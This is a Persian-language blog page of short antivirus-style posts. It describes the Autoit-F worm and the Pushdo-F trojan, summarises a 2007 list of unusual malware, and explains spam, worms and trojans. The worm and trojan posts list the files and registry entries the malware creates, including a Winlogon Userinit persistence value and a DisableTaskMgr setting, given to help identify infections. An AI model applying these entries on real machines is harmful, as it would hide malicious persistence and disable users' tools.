توضیحات :

Autoit-F یک کرم برای سیستم های ویندوزی است .

این کرم با اولین اجرا یک کپی از خود را در \Microsoft\msmsgs.exe قرار می دهد .

مدخل زیر نیز در رجیستری ایجاد می شود تا Autoit-F بتواند اجرا شود :

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit
\userinit.exe,\Microsoft\Msmsgs.ex e

همچنین این کد آلوده با تغییر مدخل های زیر نرم افزار سیستم را از کار می اندازد :

HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\system
DisableTaskMgr
1

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

تروجان Pushdo-F ( ویروس ها و تروجان ها )




Pushdo-F یک تروجان برای سیستم های ویندوزی است .

با نصب این تروجان در سیستم آلوده فایل \drivers\runtime.sys نیز در کامپیوتر ایجاد می شود .

فایل runtime.sys نیز همچون یک سرویس درایور جدید که "runtime" نامیده می شود در سیستم ثبت می شود . مدخل های زیر نیز در رجیستری ایجاد می شود :


HKLM\SYSTEM\CurrentControlSet\Services\runtime


ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

معرفي كرم ها و تروجان ها ، شناسايي و روش پاكسازي! ( ویروس ها و تروجان ها )

 

سلام دوستان عزيز .

در اين مقاله قصد دارم به معرفي انواع تروجان ها و روش مقابله و پاكسازي اونها بپردازم .
اگه دوست داشتید ادامه مطلب رو ببینید

ادامه ي مطلب ...


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

عجیب‌ترین ویروس‌های سال 2007 ( ویروس ها و تروجان ها )

عجیب‌ترین ویروس‌های سال 2007
آزمایشگاه امنیتی شركت پاندا فهرستی از نرم‌افزارهای مخرب عجیب مشاهده شده در نیمه‌ی دوم سال 2007 را منتشر كرد.

Sinowal.FY؛ تروجانی است كه با گرفتن فایل‌های كاربران به عنوان گروگان یك رباینده‌ی واقعی محسوب می‌شود!

این تروجان برای رمزنگاری فایل‌ها در رایانه‌هایی كه آلوده می‌كند و وادار كردن كاربران برای خرید یك ابزار ویژه به منظور رمزگشایی آن‌ها طراحی شده است.



RogeMario؛ کرمی است كه هدف آن سرگرم كردن كاربرانی است كه آن‌ها را آلوده می‌كند؛ این كد مخرب به گونه‌ای طراحی شده تا هر زمان رایانه‌یی را آلوده می‌كند یك نسخه از بازی معروف ماریوبراس را در آن نصب كند.
عجيب‌ترين ويروس‌هاي سال 2007

کرم‏هایی مانند Mimbot.A، MSMFunny.B یا MSMSend.A ممكن است در هر سازمان ارتباطی بین‌المللی مورد استقبال قرار بگیرند زیرا می‌توانند پیام‌ها را به شمار متعددی از زبان‌ها ارسال كنند، هرچند جملات ممكن است ساختار خوبی نداشته باشند اما به هر حال نمی‌توان همه چیز را یكجا داشت.



AttachMsngr.G؛ تروجانی است كه تشنه‌ی معلومات است، معلوماتی كه در برگیرنده‌ی تمامی اقدامات از حركات موس گرفته تا مكالمات مسنجر MSN كاربر در رایانه است؛ معمولا داشتن معلومات اندك خطرناك به شمار می‌رود اما در این مورد معلومات زیاد خطرناك است.



Voter.A؛ کرمی با وجدان شهروندی است كه شهروندان كنیایی را به مشاركت در انتخابات و رای به یكی از كاندیداها دعوت می‌كند اما متاسفانه تكنیك ناراحت كننده‌ای دارد زیرا هر نه ثانیه تصویر كاندیدای تبلیغی خود را نمایش می‌دهد.



و سرانجام CivilArmy.B ورمی است كه داستان می‌گوید و قبل از اخطار به كاربران در مورد آلوده كردن رایانه‌های آن‌ها داستان رمانتیكی را تعریف می‌كند؛ شاید انگیزه این ورم تشویق كاربران به مطالعه بیش‌تر باشد.



منبع: ایسنا
samanvilli is offline  


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     

Spam, Worm, Trojan چه فرقی با هم دارند؟ ( ویروس ها و تروجان ها )

Spam ایمیلی است كه بطور اتوماتیك برای اشخاص مختلف فرستاده می شود و اغلب اوقات یك محصول ، سرویس و یا وب سایتی را تبلیغ می كند . Spam ها مانند نامه های تبلیغاتی هستند كه توسط پست به شركت ها یا منازل فرستاه می شوند .
بعضی از Spam ها شامل مطالب فریبننده می باشند مانند این جمله : " شما برنده خوش شانس ما هستید ، برای اراسل جایزه كافیست اطلاعات زیر را برای مار ارسال كنید " . بعضی دیگر شامل تصاویر و عكسهای غیر اخلاقی می باشند .
Worm

Worm ها نوعی ویروس هستند كه اكثراً قابلیت تخریب به شكلی كه فایلی را از بین ببرند ندارند . نحوه كار Worm اغلب به این شكل است كه در حافظه اصلی كامپیوتر (Ram) مستقر می شوند و شروع به تكثیر خودشان می كنند كه این عمل موجب كند شدن سیستم و كم شدن تدریجی فضای Ram می گردد . كرم ها این قابلیت را نیز دارند كه برای آلوده كردن كامپیوترهای دیگر از ایمیل یا برنامه های چت استفاده می كنند .
Trojan

اسبهای تروا یا همانTrojan ، ویروس نیستند ، چرا ؟ به دلیل آنكه بر اساس تعریف ویروس قابلیت تكثیر ندارند . اما این قدرت را دارند كه فایلهای سیستم را پاك كنند ، در نحوه كار نرم افزار اخلال بوجود آورند و یا سیستم را از كار بیاندازند . یك اسب تروا در حقیقت یك برنامه مخرب است كه خود را به شكل یك برنامه بی خطر و معمولی نمایش میدهد


نوشته شده توسط یوسف در سه شنبه دهم اردیبهشت 1387

 لينك مطلب     


  مطالب پيشين


کپي برداري از مطالب وبلاگ فقط با ذکر منبع مجاز ميباشد .

All Rights Reserved 2005-2006 © by anamisco.blogfa.com
The Template Designed By Loghman Avand @ www.irlearn.com